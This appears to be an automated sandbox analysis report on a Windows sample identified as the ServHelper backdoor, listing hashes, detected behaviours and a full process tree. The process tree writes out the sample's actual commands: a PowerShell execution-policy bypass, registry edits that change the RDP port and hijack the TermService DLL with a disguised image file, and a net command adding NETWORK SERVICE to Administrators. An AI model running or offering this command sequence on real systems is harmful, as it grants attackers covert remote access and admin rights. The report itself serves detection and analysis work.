Analysis
-
max time kernel
131s -
max time network
140s -
platform
windows10_x64 -
resource
win10-en-20210920 -
submitted
13-10-2021 17:43
Static task
static1
Behavioral task
behavioral1
Sample
44d42138d67d0e52c3c26cb726bc8f39.exe
Resource
win7v20210408
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
44d42138d67d0e52c3c26cb726bc8f39.exe
Resource
win10-en-20210920
windows10_x64
0 signatures
0 seconds
General
-
Target
44d42138d67d0e52c3c26cb726bc8f39.exe
-
Size
4.2MB
-
MD5
44d42138d67d0e52c3c26cb726bc8f39
-
SHA1
2613e0e464b334ed66e34a8cffc174c5603dd1d9
-
SHA256
074d3a0bcfb3d4b0b179a2495004fb95947de60ce002fded7af1d1781add9d2b
-
SHA512
9d59b4dfb96bbe5b59f1b5c0561dafd8fe3f2fb1ababf4e7a384577ddf63adb703802187e7a7bfd671c4fd67e84214bb2b3283edae85e0f2a424148d9e0be1fa
Score
10/10
Malware Config
Signatures
-
ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Drops file in System32 directory 1 IoCs
description ioc Process File created C:\Windows\SysWOW64\rdpclip.exe powershell.exe -
Drops file in Windows directory 8 IoCs
description ioc Process File created C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 3192 reg.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 15 IoCs
pid Process 2224 powershell.exe 2224 powershell.exe 2224 powershell.exe 2428 powershell.exe 2428 powershell.exe 2428 powershell.exe 3616 powershell.exe 3616 powershell.exe 3616 powershell.exe 4392 powershell.exe 4392 powershell.exe 4392 powershell.exe 2224 powershell.exe 2224 powershell.exe 2224 powershell.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 624 Process not Found -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2224 powershell.exe Token: SeDebugPrivilege 2428 powershell.exe Token: SeDebugPrivilege 3616 powershell.exe Token: SeDebugPrivilege 4392 powershell.exe -
Suspicious use of WriteProcessMemory 63 IoCs
description pid Process procid_target PID 3572 wrote to memory of 2224 3572 44d42138d67d0e52c3c26cb726bc8f39.exe 72 PID 3572 wrote to memory of 2224 3572 44d42138d67d0e52c3c26cb726bc8f39.exe 72 PID 3572 wrote to memory of 2224 3572 44d42138d67d0e52c3c26cb726bc8f39.exe 72 PID 2224 wrote to memory of 1180 2224 powershell.exe 74 PID 2224 wrote to memory of 1180 2224 powershell.exe 74 PID 2224 wrote to memory of 1180 2224 powershell.exe 74 PID 1180 wrote to memory of 1412 1180 csc.exe 75 PID 1180 wrote to memory of 1412 1180 csc.exe 75 PID 1180 wrote to memory of 1412 1180 csc.exe 75 PID 2224 wrote to memory of 2428 2224 powershell.exe 76 PID 2224 wrote to memory of 2428 2224 powershell.exe 76 PID 2224 wrote to memory of 2428 2224 powershell.exe 76 PID 2224 wrote to memory of 3616 2224 powershell.exe 78 PID 2224 wrote to memory of 3616 2224 powershell.exe 78 PID 2224 wrote to memory of 3616 2224 powershell.exe 78 PID 2224 wrote to memory of 4392 2224 powershell.exe 80 PID 2224 wrote to memory of 4392 2224 powershell.exe 80 PID 2224 wrote to memory of 4392 2224 powershell.exe 80 PID 2224 wrote to memory of 2340 2224 powershell.exe 84 PID 2224 wrote to memory of 2340 2224 powershell.exe 84 PID 2224 wrote to memory of 2340 2224 powershell.exe 84 PID 2224 wrote to memory of 3192 2224 powershell.exe 85 PID 2224 wrote to memory of 3192 2224 powershell.exe 85 PID 2224 wrote to memory of 3192 2224 powershell.exe 85 PID 2224 wrote to memory of 2784 2224 powershell.exe 86 PID 2224 wrote to memory of 2784 2224 powershell.exe 86 PID 2224 wrote to memory of 2784 2224 powershell.exe 86 PID 2224 wrote to memory of 1072 2224 powershell.exe 87 PID 2224 wrote to memory of 1072 2224 powershell.exe 87 PID 2224 wrote to memory of 1072 2224 powershell.exe 87 PID 1072 wrote to memory of 5004 1072 net.exe 88 PID 1072 wrote to memory of 5004 1072 net.exe 88 PID 1072 wrote to memory of 5004 1072 net.exe 88 PID 2224 wrote to memory of 4800 2224 powershell.exe 89 PID 2224 wrote to memory of 4800 2224 powershell.exe 89 PID 2224 wrote to memory of 4800 2224 powershell.exe 89 PID 4800 wrote to memory of 1476 4800 cmd.exe 90 PID 4800 wrote to memory of 1476 4800 cmd.exe 90 PID 4800 wrote to memory of 1476 4800 cmd.exe 90 PID 1476 wrote to memory of 2552 1476 cmd.exe 91 PID 1476 wrote to memory of 2552 1476 cmd.exe 91 PID 1476 wrote to memory of 2552 1476 cmd.exe 91 PID 2552 wrote to memory of 5016 2552 net.exe 92 PID 2552 wrote to memory of 5016 2552 net.exe 92 PID 2552 wrote to memory of 5016 2552 net.exe 92 PID 2224 wrote to memory of 5020 2224 powershell.exe 93 PID 2224 wrote to memory of 5020 2224 powershell.exe 93 PID 2224 wrote to memory of 5020 2224 powershell.exe 93 PID 5020 wrote to memory of 5068 5020 cmd.exe 94 PID 5020 wrote to memory of 5068 5020 cmd.exe 94 PID 5020 wrote to memory of 5068 5020 cmd.exe 94 PID 5068 wrote to memory of 1528 5068 cmd.exe 95 PID 5068 wrote to memory of 1528 5068 cmd.exe 95 PID 5068 wrote to memory of 1528 5068 cmd.exe 95 PID 1528 wrote to memory of 4700 1528 net.exe 96 PID 1528 wrote to memory of 4700 1528 net.exe 96 PID 1528 wrote to memory of 4700 1528 net.exe 96 PID 2224 wrote to memory of 4528 2224 powershell.exe 98 PID 2224 wrote to memory of 4528 2224 powershell.exe 98 PID 2224 wrote to memory of 4528 2224 powershell.exe 98 PID 2224 wrote to memory of 4376 2224 powershell.exe 99 PID 2224 wrote to memory of 4376 2224 powershell.exe 99 PID 2224 wrote to memory of 4376 2224 powershell.exe 99
Processes
-
C:\Users\Admin\AppData\Local\Temp\44d42138d67d0e52c3c26cb726bc8f39.exe"C:\Users\Admin\AppData\Local\Temp\44d42138d67d0e52c3c26cb726bc8f39.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3572 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2224 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ebzvxi4p\ebzvxi4p.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:1180 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES468A.tmp" "c:\Users\Admin\AppData\Local\Temp\ebzvxi4p\CSC107718C646414F85A5263584553A3B5D.TMP"4⤵PID:1412
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2428
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3616
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4392
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵PID:2340
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
PID:3192
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵PID:2784
-
-
C:\Windows\SysWOW64\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
PID:1072 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵PID:5004
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
PID:4800 -
C:\Windows\SysWOW64\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
PID:1476 -
C:\Windows\SysWOW64\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
PID:2552 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start rdpdr6⤵PID:5016
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
- Suspicious use of WriteProcessMemory
PID:5020 -
C:\Windows\SysWOW64\cmd.execmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
PID:5068 -
C:\Windows\SysWOW64\net.exenet start TermService5⤵
- Suspicious use of WriteProcessMemory
PID:1528 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start TermService6⤵PID:4700
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵PID:4528
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵PID:4376
-
-